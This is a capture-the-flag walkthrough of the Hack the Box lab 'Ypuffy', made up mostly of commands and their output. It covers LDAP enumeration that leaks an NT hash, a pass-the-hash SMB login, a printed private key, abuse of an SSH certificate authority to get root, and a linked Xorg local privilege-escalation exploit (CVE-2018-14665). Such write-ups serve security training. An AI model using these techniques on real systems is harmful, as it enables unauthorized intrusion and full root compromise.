Today we are going to solve another CTF challenge “Ypuffy”. It is a retired vulnerable lab presented by Hack the Box for helping pentester’s to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.
Level: Intermediate
Task: To find user.txt and root.txt file
Note: Since these labs are online available therefore they have a static IP. The IP of Ypuffy is 10.10.10.107
Let’s start off with our basic nmap command to find out the open ports and services.
c:\Users\jacco>nmap -sV -sC 10.10.10.107 Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-17 20:51 W. Europe Standard Time Nmap scan report for 10.10.10.107 Host is up (0.039s latency). Not shown: 995 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.7 (protocol 2.0) | ssh-hostkey: | 2048 2e:19:e6:af:1b:a7:b0:e8:07:2a:2b:11:5d:7b:c6:04 (RSA) | 256 dd:0f:6a:2a:53:ee:19:50:d9:e5:e7:81:04:8d:91:b6 (ECDSA) |_ 256 21:9e:db:bd:e1:78:4d:72:b0:ea:b4:97:fb:7f:af:91 (ED25519) 80/tcp open http OpenBSD httpd 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: YPUFFY) 389/tcp open ldap (Anonymous bind OK) 445/tcp open netbios-ssn Samba smbd 4.7.6 (workgroup: YPUFFY) Service Info: Host: YPUFFY Host script results: |_clock-skew: mean: 1h36m15s, deviation: 2h53m13s, median: -3m45s | smb-os-discovery: | OS: Windows 6.1 (Samba 4.7.6) | Computer name: ypuffy | NetBIOS computer name: YPUFFY\x00 | Domain name: hackthebox.htb | FQDN: ypuffy.hackthebox.htb |_ System time: 2019-02-17T14:47:47-05:00 | smb-security-mode: | account_used: <blank> | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2019-02-17 20:47:46 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 66.51 seconds
As LDAP service is running on port 389, we use nmap script called “ldap-search” to enumerate the target machine and we find the password hash for user “alice1978”.
c:\Users\jacco>nmap -p389 --script=ldap-search 10.10.10.107 Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-17 20:56 W. Europe Standard Time Nmap scan report for 10.10.10.107 Host is up (0.027s latency). PORT STATE SERVICE 389/tcp open ldap | ldap-search: | Context: dc=hackthebox,dc=htb | dn: dc=hackthebox,dc=htb | dc: hackthebox | objectClass: top | objectClass: domain | dn: ou=passwd,dc=hackthebox,dc=htb | ou: passwd | objectClass: top | objectClass: organizationalUnit | dn: uid=bob8791,ou=passwd,dc=hackthebox,dc=htb | uid: bob8791 | cn: Bob | objectClass: account | objectClass: posixAccount | objectClass: top | userPassword: {BSDAUTH}bob8791 | uidNumber: 5001 | gidNumber: 5001 | gecos: Bob | homeDirectory: /home/bob8791 | loginShell: /bin/ksh | dn: uid=alice1978,ou=passwd,dc=hackthebox,dc=htb | uid: alice1978 | cn: Alice | objectClass: account | objectClass: posixAccount | objectClass: top | objectClass: sambaSamAccount | userPassword: {BSDAUTH}alice1978 | uidNumber: 5000 | gidNumber: 5000 | gecos: Alice | homeDirectory: /home/alice1978 | loginShell: /bin/ksh | sambaSID: S-1-5-21-3933741069-3307154301-3557023464-1001 | displayName: Alice | sambaAcctFlags: [U ] | sambaPasswordHistory: 00000000000000000000000000000000000000000000000000000000 | sambaNTPassword: 0B186E661BBDBDCF6047784DE8B9FD8B | sambaPwdLastSet: 1532916644 | dn: ou=group,dc=hackthebox,dc=htb | ou: group | objectClass: top | objectClass: organizationalUnit | dn: cn=bob8791,ou=group,dc=hackthebox,dc=htb | objectClass: posixGroup | objectClass: top | cn: bob8791 | userPassword: {crypt}* | gidNumber: 5001 | dn: cn=alice1978,ou=group,dc=hackthebox,dc=htb | objectClass: posixGroup | objectClass: top | cn: alice1978 | userPassword: {crypt}* | gidNumber: 5000 | dn: sambadomainname=ypuffy,dc=hackthebox,dc=htb | sambaDomainName: YPUFFY | sambaSID: S-1-5-21-3933741069-3307154301-3557023464 | sambaAlgorithmicRidBase: 1000 | objectclass: sambaDomain | sambaNextUserRid: 1000 | sambaMinPwdLength: 5 | sambaPwdHistoryLength: 0 | sambaLogonToChgPwd: 0 | sambaMaxPwdAge: -1 | sambaMinPwdAge: 0 | sambaLockoutDuration: 30 | sambaLockoutObservationWindow: 30 | sambaLockoutThreshold: 0 | sambaForceLogoff: -1 | sambaRefuseMachinePwdChange: 0 |_ sambaNextRid: 1001 Nmap done: 1 IP address (1 host up) scanned in 12.73 seconds
First, we check the shared directory available on the target machine and find a directory called “alice”. We then access the shared directory and find a file called “my_private_key.ppk”, we download the file to our local system.
root@kali:~/htb/ypuffy# smbmap -u alice1978 -p aad3b435b51404eeaad3b435b51404ee:0B186E661BBDBDCF6047784DE8B9FD8B -d YPUFFY -H 10.10.10.107 -r [+] Finding open SMB ports.... [+] Hash detected, using pass-the-hash to authentiate [+] User session establishd on 10.10.10.107... [+] IP: 10.10.10.107:445 Name: 10.10.10.107 Disk Permissions ---- ----------- alice READ, WRITE ./ dr--r--r-- 0 Sun Feb 17 21:03:33 2019 . dr--r--r-- 0 Wed Aug 1 05:16:50 2018 .. fr--r--r-- 1460 Tue Jul 17 03:38:51 2018 my_private_key.ppk IPC$ NO ACCESS
root@kali:~/htb/ypuffy# smbmap -u alice1978 -p aad3b435b51404eeaad3b435b51404ee:0B186E661BBDBDCF6047784DE8B9FD8B -d YPUFFY -H 10.10.10.107 --download alice/my_private_key.ppk [+] Finding open SMB ports.... [+] Hash detected, using pass-the-hash to authentiate [+] User session establishd on 10.10.10.107... [+] Starting download: alice\my_private_key.ppk (1460 bytes) [+] File output to: /usr/share/smbmap/10.10.10.107-alice_my_private_key.ppk
root@kali:~/htb/ypuffy# cat /usr/share/smbmap/10.10.10.107-alice_my_private_key.ppk PuTTY-User-Key-File-2: ssh-rsa Encryption: none Comment: rsa-key-20180716 Public-Lines: 6 AAAAB3NzaC1yc2EAAAABJQAAAQEApV4X7z0KBv3TwDxpvcNsdQn4qmbXYPDtxcGz 1am2V3wNRkKR+gRb3FIPp+J4rCOS/S5skFPrGJLLFLeExz7Afvg6m2dOrSn02qux BoLMq0VSFK5A0Ep5Hm8WZxy5wteK3RDx0HKO/aCvsaYPJa2zvxdtp1JGPbN5zBAj h7U8op4/lIskHqr7DHtYeFpjZOM9duqlVxV7XchzW9XZe/7xTRrbthCvNcSC/Sxa iA2jBW6n3dMsqpB8kq+b7RVnVXGbBK5p4n44JD2yJZgeDk+1JClS7ZUlbI5+6KWx ivAMf2AqY5e1adjpOfo6TwmB0Cyx0rIYMvsog3HnqyHcVR/Ufw== Private-Lines: 14 AAABAH0knH2xprkuycHoh18sGrlvVGVG6C2vZ9PsiBdP/5wmhpYI3Svnn3ZL8CwF VGaXdidhZunC9xmD1/QAgCgTz/Fh5yl+nGdeBWc10hLD2SeqFJoHU6SLYpOSViSE cOZ5mYSy4IIRgPdJKwL6NPnrO+qORSSs9uKVqEdmKLm5lat9dRJVtFlG2tZ7tsma hRM//9du5MKWWemJlW9PmRGY6shATM3Ow8LojNgnpoHNigB6b/kdDozx6RIf8b1q Gs+gaU1W5FVehiV6dO2OjHUoUtBME01owBLvwjdV/1Sea/kcZa72TYIMoN1MUEFC 3hlBVcWbiy+O27JzmDzhYen0Jq0AAACBANTBwU1DttMKKphHAN23+tvIAh3rlNG6 m+xeStOxEusrbNL89aEU03FWXIocoQlPiQBr3s8OkgMk1QVYABlH30Y2ZsPL/hp6 l4UVEuHUqnTfEOowVTcVNlwpNM8YLhgn+JIeGpJZqus5JK/pBhK0JclenIpH5M2v 4L9aKFwiMZxfAAAAgQDG+o9xrh+rZuQg8BZ6ZcGGdszZITn797a4YU+NzxjP4jR+ qSVCTRky9uSP0i9H7B9KVnuu9AfzKDBgSH/zxFnJqBTTykM1imjt+y1wVa/3aLPh hKxePlIrP3YaMKd38ss2ebeqWy+XJYwgWOsSw8wAQT7fIxmT8OYfJRjRGTS74QAA AIEAiOHSABguzA8sMxaHMvWu16F0RKXLOy+S3ZbMrQZr+nDyzHYPaLDRtNE2iI5c QLr38t6CRO6zEZ+08Zh5rbqLJ1n8i/q0Pv+nYoYlocxw3qodwUlUYcr1/sE+Wuvl xTwgKNIb9U6L6OdSr5FGkFBCFldtZ/WSHtbHxBabb0zpdts= Private-MAC: 208b4e256cd56d59f70e3594f4e2c3ca91a757c9
The file we downloaded was a “Putty Private Key” file, so we use puttygen to convert the file into RSA private key. After converting it into RSA key, we change the permission of the RSA key and use it to login through SSH.
root@kali:~/htb/ypuffy# cp /usr/share/smbmap/10.10.10.107-alice_my_private_key.ppk . root@kali:~/htb/ypuffy# apt-get install putty root@kali:~/htb/ypuffy# puttygen 10.10.10.107-alice_my_private_key.ppk -O private-openssh -o id_rsa root@kali:~/htb/ypuffy# chmod 600 id_rsa root@kali:~/htb/ypuffy# ssh -i id_rsa alice1978@10.10.10.107 OpenBSD 6.3 (GENERIC) #100: Sat Mar 24 14:17:45 MDT 2018 Welcome to OpenBSD: The proactively secure Unix-like operating system. Please use the sendbug(1) utility to report bugs in the system. Before reporting a bug, please try to reproduce it with the latest version of the code. With bug reports, please try to ensure that enough information to reproduce the problem is enclosed, and if a known fix for it exists, include that as well. ypuffy$ cat user.txt acb*****aab
Now we check the files with suid bit enabled and find that “doas” is available on the target machine. It is a command utility similar to the “sudo” command. Now we check “/etc/doas.conf” to find what commands we can run. We find that we can run “/usr/bin/ssh-keygen” as user “userca”.
ypuffy$ find / -perm -4000 2>/dev/null /usr/bin/chfn /usr/bin/chpass /usr/bin/chsh /usr/bin/doas /usr/bin/lpr /usr/bin/lprm /usr/bin/passwd /usr/bin/su /usr/libexec/lockspool /usr/libexec/ssh-keysign /usr/local/bin/pwned /usr/local/libexec/dbus-daemon-launch-helper /usr/sbin/authpf /usr/sbin/authpf-noip /usr/sbin/pppd /usr/sbin/traceroute /usr/sbin/traceroute6 /usr/X11R6/bin/Xorg /sbin/ping /sbin/ping6 /sbin/shutdown ypuffy$ cat /etc/doas.conf permit keepenv :wheel permit nopass alice1978 as userca cmd /usr/bin/ssh-keygen
ypuffy$ cat /etc/httpd.conf server "ypuffy.hackthebox.htb" { listen on * port 80 location "/userca*" { root "/userca" root strip 1 directory auto index } location "/sshauth*" { fastcgi socket "/run/wsgi/sshauthd.socket" } location * { block drop } }
ypuffy$ cat /etc/ssh/sshd_config # $OpenBSD: sshd_config,v 1.102 2018/02/16 02:32:40 djm Exp $ # This is the sshd server system-wide configuration file. See # sshd_config(5) for more information. # The strategy used for options in the default sshd_config shipped with # OpenSSH is to specify options with their default value where # possible, but leave them commented. Uncommented options override the # default value. #Port 22 #AddressFamily any #ListenAddress 0.0.0.0 #ListenAddress :: #HostKey /etc/ssh/ssh_host_rsa_key #HostKey /etc/ssh/ssh_host_ecdsa_key #HostKey /etc/ssh/ssh_host_ed25519_key # Ciphers and keying #RekeyLimit default none # Logging #SyslogFacility AUTH #LogLevel INFO # Authentication: #LoginGraceTime 2m PermitRootLogin prohibit-password #StrictModes yes #MaxAuthTries 6 #MaxSessions 10 #PubkeyAuthentication yes # The default is to check both .ssh/authorized_keys and .ssh/authorized_keys2 # but this is overridden so installations will only check .ssh/authorized_keys AuthorizedKeysFile .ssh/authorized_keys #AuthorizedPrincipalsFile none AuthorizedKeysCommand /usr/local/bin/curl http://127.0.0.1/sshauth?type=keys&username=%u AuthorizedKeysCommandUser nobody TrustedUserCAKeys /home/userca/ca.pub AuthorizedPrincipalsCommand /usr/local/bin/curl http://127.0.0.1/sshauth?type=principals&username=%u AuthorizedPrincipalsCommandUser nobody # For this to work you will also need host keys in /etc/ssh/ssh_known_hosts #HostbasedAuthentication no # Change to yes if you don't trust ~/.ssh/known_hosts for --snip-- # PermitTTY no # ForceCommand cvs server ypuffy$
Énumerating more
ypuffy$ curl 127.0.0.1/userca/ca.pub ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDdYGWZ77kquuiB0W2mPou1MJQaJqX7EEzNHJGQnGqbc7aJMJBtdleDFt4JHVziOAKtT6MUV5/UTSKloLw40T8z1EaAm3ilXoBTQRu9tC3dSkJMV1B4/AN8638KEyFkOGvZ6hFULkch9O3vZsFH8GY/xf8CZNP8hTD/P3EZaXfCEaebAgNb9mlPxA1EfjxTEiAxQJIwYkUcsoEDK/IyJWBXd9MhIm8ejLKuKor9fihHMiwnNTwskwcknt4JZ/tom3CbxmV0wF+nbuIiWWe5HFjeNaxKgfC3RNycVeu0ynUZ3QGPTGILoPQ8jcQoD5pUyKVRMvp33xtbq8CYwIi/lV+b userca@ypuffy.hackthebox.htb
ypuffy$ getent passwd |grep -v ^_ root:*:0:0:Charlie &:/root:/bin/ksh daemon:*:1:1:The devil himself:/root:/sbin/nologin operator:*:2:5:System &:/operator:/sbin/nologin bin:*:3:7:Binaries Commands and Source:/:/sbin/nologin build:*:21:21:base and xenocara build:/var/empty:/bin/ksh sshd:*:27:27:sshd privsep:/var/empty:/sbin/nologin www:*:67:67:HTTP Server:/var/www:/sbin/nologin nobody:*:32767:32767:Unprivileged user:/nonexistent:/sbin/nologin appsrv:*:1000:1000:Application Server:/var/appsrv:/sbin/nologin alice1978:*:5000:5000:Alice:/home/alice1978:/bin/ksh
ypuffy$ curl 'http://127.0.0.1/sshauth?type=keys&username=alice1978' ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEApV4X7z0KBv3TwDxpvcNsdQn4qmbXYPDtxcGz1am2V3wNRkKR+gRb3FIPp+J4rCOS/S5skFPrGJLLFLeExz7Afvg6m2dOrSn02quxBoLMq0VSFK5A0Ep5Hm8WZxy5wteK3RDx0HKO/aCvsaYPJa2zvxdtp1JGPbN5zBAjh7U8op4/lIskHqr7DHtYeFpjZOM9duqlVxV7XchzW9XZe/7xTRrbthCvNcSC/SxaiA2jBW6n3dMsqpB8kq+b7RVnVXGbBK5p4n44JD2yJZgeDk+1JClS7ZUlbI5+6KWxivAMf2AqY5e1adjpOfo6TwmB0Cyx0rIYMvsog3HnqyHcVR/Ufw== rsa-key-20180716
we requested keys for root user and get no response but we are successfully able to get root user’s principal.
ypuffy$ curl "http://127.0.0.1/sshauth?type=principals&username=root" 3m3rgencyB4ckd00r
As we have the root user’s principal, we can generate SSH keys and sign them with root’s principal. Doing so will allow us to login through SSH as root. Now we know we can run ssh-keygen to generate SSH keys but first, we need a certificate to sign the SSH key. We enumerate the machine to find a certificate and find one inside /home/userca directory.
First, we generate SSH keys and copy them into the /tmp/puckie directory. Then we sign the keys as userca to read the certificate inside /home/userca/ca.
ypuffy$ ssh-keygen -f root Generating public/private rsa key pair. Enter passphrase (empty for no passphrase): Enter same passphrase again: Your identification has been saved in root. Your public key has been saved in root.pub. The key fingerprint is: SHA256:eX4CmLxRPoydlUfYVNVxt8Tm/zUGLgEBgK4nrVZ9F1c alice1978@ypuffy.hackthebox.htb The key's randomart image is: +---[RSA 2048]----+ | .......+o.o+*| | . ..o.E.o=| | . . + o o. | | . . O = + . . | | o . * S + o . .| | o + . + * . . oo| | = o . o o . +| | o o .| |. | +----[SHA256]-----+ ypuffy$ ls -la total 16 drwxrwxrwx 2 alice1978 wheel 512 Feb 19 06:04 . drwxrwxrwt 7 root wheel 512 Feb 19 05:50 .. -rw------- 1 alice1978 wheel 1679 Feb 19 06:04 root -rw-r--r-- 1 alice1978 wheel 413 Feb 19 06:04 root.pub
ypuffy$ doas -u userca /usr/bin/ssh-keygen -s /home/userca/ca -n 3m3rgencyB4ckd00r -I root root Signed user key root-cert.pub: id "root" serial 0 for 3m3rgencyB4ckd00r valid forever ypuffy$ ls -la total 20 drwxrwxrwx 2 alice1978 wheel 512 Feb 19 06:22 . drwxrwxrwt 7 root wheel 512 Feb 19 06:12 .. -rw------- 1 alice1978 wheel 1675 Feb 19 06:21 root -rw-r--r-- 1 userca wheel 1526 Feb 19 06:44 root-cert.pub -rw-r--r-- 1 alice1978 wheel 413 Feb 19 06:21 root.pub ypuffy$ ssh root@localhost -i root OpenBSD 6.3 (GENERIC) #100: Sat Mar 24 14:17:45 MDT 2018 Welcome to OpenBSD: The proactively secure Unix-like operating system. Please use the sendbug(1) utility to report bugs in the system. Before reporting a bug, please try to reproduce it with the latest version of the code. With bug reports, please try to ensure that enough information to reproduce the problem is enclosed, and if a known fix for it exists, include that as well. ypuffy# whoami root ypuffy# cat /root/root.txt 126*****57f
After signing the RSA keys, we use the RSA key to login through SSH as the root user.
On October 25th, 2018 (after the release of this box), a vulnerability impacting Xorg server before 1.20.3 was disclosed. It allowed privilege escalation on OpenBSD 6.3 and 6.4. The CVE-2018–14665 was assigned.
$ uname -a OpenBSD ypuffy.hackthebox.htb 6.3 GENERIC#100 amd64
Upload the following exploit on the server and run it to get root: https://www.exploit-db.com/exploits/45742.
ypuffy$ cd /tmp ypuffy$ vi puckie.sh ypuffy$ chmod +x puckie.sh ypuffy$ ./puckie.sh ./puckie.sh[1]: it: not found raptor_xorgasm - xorg-x11-server LPE via OpenBSD's cron Copyright (c) 2018 Marco Ivaldi <raptor@0xdeadbeef.info> X.Org X Server 1.19.6 Release Date: 2017-12-20 X Protocol Version 11, Revision 0 Build Operating System: OpenBSD 6.3 amd64 Current Operating System: OpenBSD ypuffy.hackthebox.htb 6.3 GENERIC#100 amd64 Build Date: 24 March 2018 02:38:24PM Current version of pixman: 0.34.0 Before reporting problems, check http://wiki.x.org to make sure that you have the latest version. Markers: (--) probed, (**) from config file, (==) default setting, (++) from command line, (!!) notice, (II) informational, (WW) warning, (EE) error, (NI) not implemented, (??) unknown. (++) Log file: "crontab", Time: Sun Feb 17 15:29:00 2019 (==) Using system config directory "/usr/X11R6/share/X11/xorg.conf.d" (EE) Segmentation fault at address 0x8 (EE) Fatal server error: (EE) Caught signal 11 (Segmentation fault). Server aborting (EE) (EE) Please consult the The X.Org Foundation support at http://wiki.x.org for help. (EE) Please also check the log file at "crontab" for additional information. (EE) (EE) Server terminated with error (1). Closing log file. Be patient for a couple of minutes... Don't forget to cleanup and run crontab -e to reload the crontab. -rw-r--r-- 1 root wheel 4813 Feb 17 15:29 /etc/crontab -rw-r--r-- 1 root wheel 4814 Feb 14 16:00 /etc/crontab.old -rwsrwxrwx 1 root wheel 7257 Feb 17 15:31 /usr/local/bin/pwned ypuffy# ypuffy# whoami root ypuffy# cat /root/root.txt 126*****57f
Author : Jacco Straathof